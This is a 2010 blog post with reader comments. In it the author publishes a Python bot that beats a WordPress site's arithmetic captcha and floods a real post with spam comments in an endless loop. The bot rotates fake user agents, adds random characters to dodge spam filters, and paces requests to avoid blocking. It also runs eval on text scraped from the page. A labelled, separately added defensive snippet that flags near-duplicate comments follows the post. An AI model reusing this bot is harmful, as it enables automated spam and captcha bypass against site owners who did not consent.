break a time, with break the c0de…

virusindonesia.com captcha broke


Well, at first I was just idly
looking at a virus made by a friend;
you can see it here:
http://virusindonesia.com/2010/08/30/flyff-reinkarnasi-amburadul/

Since I have been experimenting a lot with captchas lately,
I also just want to point out that this captcha is not a good one,
given that it can be defeated by simulation.

Here is the source code of the program…

#!/usr/bin/python
import mechanize, cookielib, re, time, random
randstring	= ['a','b','c','d','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z',
		   'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z',
		   '1','2','3','4','5','6','7','8','9','0'
		  ]
header = {
          "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3",
          "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
          "Accept-Language": "en-us,en;q=0.5",
          "Accept-Encoding": "gzip,deflate",
          "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
          "Keep-Alive": "99999",
          "Proxy-Connection": "keep-alive",
          "Content-Type": "application/x-www-form-urlencoded"
}
ouruseragent 	= ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
		'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1',
		'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
		'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
		'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
        	'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
        	'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
        	'Microsoft Internet Explorer/4.0b1 (Windows 95)',
        	'Opera/8.00 (Windows NT 5.1; U; en)',
		'amaya/9.51 libwww/5.4.0',
		'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
		'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
		'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
		'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
		'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
		'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]']
		
br = mechanize.Browser()
# Cookie Jar
cj = cookielib.LWPCookieJar()
br.set_cookiejar(cj)
# Browser options
br.set_handle_equiv(True)
br.set_handle_gzip(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
# Follows refresh 0 but not hangs on refresh > 0
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
# Want debugging messages ??
#br.set_debug_http(True)
#br.set_debug_redirects(True)
#br.set_debug_responses(True)
# try to cheat
br.addheaders = [('User-agent', random.choice(ouruseragent))]

def main():
	'''infinite loop'''
	while 1:
		print "[*] Going to virusindonesia.com"
		page = br.open("http://virusindonesia.com/2010/08/30/flyff-reinkarnasi-amburadul/")
		read = page.read()
		captcha = re.findall("<strong>Hasil dari (.*) ?</strong>",read)
		captchaclean = captcha[0]
		captchaclean = captchaclean.replace(" ?","")
		print "[*] Got question   : %s " % captchaclean
		result = eval(''.join([str(x) for x in captchaclean])) # we give her to thinking some math ;)
		print "[*] Program answer : %d " % int(result)
		br.select_form(nr=1)
		br.form['author'] = 'rise of robot !!!'
		br.form['email'] = 'yudha.gunslinger@gmail[dot]com'
		br.form['url'] = 'http://gunslingerc0de.wordpress[dot]com'
		br.form['mcspvalue'] = str(result)
		br.form['comment'] = '''
		RISE OF ROBOT !!
		
		YOUR CAPTCHA DEFEATED !!
		PLEASE PATCH !!
		https://gunslingerc0de.wordpress.com
		%s%s%s
		''' % (str(random.choice(randstring)), str(random.choice(randstring)), str(random.choice(randstring))) # prevent blocking by string checker ;)
		br.submit()
		# print br.response().read()
		print "[*] Spammed successfully..."
		time.sleep(1)
		print "[*] Sleeping for 30 seconds please wait"
		time.sleep(30) # prevent blocking too, so we need time.sleep() ;)... or we get forbidden status ;)
		print "[*] Ready to rock baby..."
		
if __name__ == '__main__':
	main()

After I had given the reminder with a few spam comments, they were deleted by virusindonesia themselves a few minutes later (well, good job, quick response).
With this I hope the site will replace its captcha so that it does not get spammed by others ;)
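
On the receiving side, a check for the traffic this script produces (one message template with a changing three-character tail, posted roughly every 30 seconds) can hold such comments even when the captcha answer is correct. This is an added example, not part of the original post or of the site's code; the function names, thresholds and sample comments are assumptions constructed for illustration.

```python
import re
from difflib import SequenceMatcher

WINDOW_SECONDS = 600   # look-back window per post (assumed policy value)
SIMILARITY = 0.90      # ratio at which two bodies count as the same message (assumed)
MAX_SIMILAR = 2        # similar comments accepted per window before holding (assumed)

def normalize(body):
    """Lowercase, mask URLs and collapse whitespace so cosmetic changes vanish."""
    body = re.sub(r"https?://\S+", "<url>", body.lower())
    return re.sub(r"\s+", " ", body).strip()

def is_near_duplicate(a, b):
    """True when two comment bodies differ only by a few characters."""
    matcher = SequenceMatcher(None, normalize(a), normalize(b), autojunk=False)
    return matcher.ratio() >= SIMILARITY

def hold_for_moderation(history, new_comment):
    """history: (timestamp, body) pairs already accepted on one post."""
    ts, body = new_comment
    recent = [b for t, b in history if ts - t <= WINDOW_SECONDS]
    similar = sum(1 for b in recent if is_near_duplicate(b, body))
    return similar >= MAX_SIMILAR

def review(stream):
    """Run comments in arrival order; return one held/accepted flag per comment."""
    history, decisions = [], []
    for comment in stream:
        held = hold_for_moderation(history, comment)
        decisions.append(held)
        if not held:
            history.append(comment)
    return decisions

# Constructed sample: one template with a changing 3-character tail, ~30 s apart,
# plus one ordinary reader comment in between.
TEMPLATE = "RISE OF ROBOT !!\nYOUR CAPTCHA DEFEATED !!\nPLEASE PATCH !!\nhttp://example.invalid/\n%s"
SAMPLE = [
    (0, TEMPLATE % "a7Q"),
    (31, TEMPLATE % "k2M"),
    (45, "Nice write-up, thanks for analysing this sample."),
    (62, TEMPLATE % "Zp9"),
    (93, TEMPLATE % "0bX"),
]

if __name__ == "__main__":
    print(review(SAMPLE))
```

The similarity check compares whole bodies, so a per-minute rate limit that the 30-second sleep stays under is not the only signal the site relies on.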


10 responses

  1. Cool, bro… the logic

    September 4, 2010 at 9:04 am

  2. Hahaha…. cool, bro…
    If only it hadn't been deleted yet…. I wanted to see it…

    September 4, 2010 at 9:37 am

  3. one-day

    Error :

    print “[*] Going to virusindonesia.com”
    ^
    SyntaxError: invalid syntax

    September 4, 2010 at 12:36 pm

    • don’t blind copy paste, view source first

      September 5, 2010 at 3:18 am

      • Got it, bro!

        September 8, 2010 at 3:50 am

  4. Awesooooome :D

    see, his projects are so cool, tsk tsk

    RISE of Robot :D

    September 6, 2010 at 1:01 pm

  5. tasuda

    Bro, I'm rei, I'd like to ask how to make

    that on wordpress.com, how is it done..?
    please share how..^^

    September 10, 2010 at 10:08 am

  6. Bro guns, teach me Python, please :D

    September 14, 2010 at 2:46 pm

  7. Can that be done on other websites or not?

    September 15, 2010 at 3:17 pm

  8. Pingback: Wasssuuuw!-virusindonesia.com captcha broke | Asu & Celeng ™
